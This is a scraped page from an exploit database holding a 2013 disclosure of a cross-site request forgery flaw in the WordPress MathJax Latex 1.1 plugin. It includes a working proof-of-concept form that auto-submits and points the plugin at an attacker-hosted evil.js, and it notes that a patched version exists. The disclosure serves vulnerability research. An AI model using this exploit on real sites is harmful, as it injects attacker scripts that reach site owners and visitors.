0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wordpress Mathjax Latex 1.1 CSRF Vulnerability
# Title: Wordpress Mathjax Latex 1.1 Cross-Site Request Forgery Vulnerability # Release Date: 25/03/13 # Author: Junaid Hussain [ illSecure Research Group ] # Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com # Software Link: http://downloads.wordpress.org/plugin/mathjax-latex.1.1.zip # Tested on CentOs 5 - Wordpress Version 3.5 ---------------------------------------------------------------------------------------------------------- There is no CSRF protection on the mathjax option page. This allows an attacker to specify arbitrary javascript that will be loaded with each post and also loaded onto the homepage of the wordpress blog ---------------------------------------------------------------------------------------------------------- //##### CSRF - Proof Of Concept: <html> <body onload="javascript:document.forms[0].submit()"> <form id="mathjaxlatex" name="mathjaxlatex" action="http://[DOMAINNAME]/wp-admin/options-general.php?page=mathjax-latex.php" method='POST'> <input type="hidden" name="mathjax_hidden" style="display:none;" value="Y"> <input type="checkbox" name="force_load" style="display:none;" value="1"CHECKED/> <input type="checkbox" name="default_disabled" style="display:none;" value="1"CHECKED/> <input type='textbox' name='mathjax_location' class='regular-text code' value='http://illsecure.com/code/evil.js' style="display:none;"/> </form> </html> ---------------------------------------------------------------------------------------------------------- //##### Patch: The Vendor Was notified and a patch was released: --- Patched Version: http://downloads.wordpress.org/plugin/mathjax-latex.1.2.1.zip --- See ChangeLog: http://wordpress.org/extend/plugins/mathjax-latex/changelog/ ---------------------------------------------------------------------------------------------------------- Contact: illSecResearchGroup@gmail.com - Junaid Hussain - http://illsecure.com ---------------------------------------------------------------------------------------------------------- # 0day.today [2024-12-25] #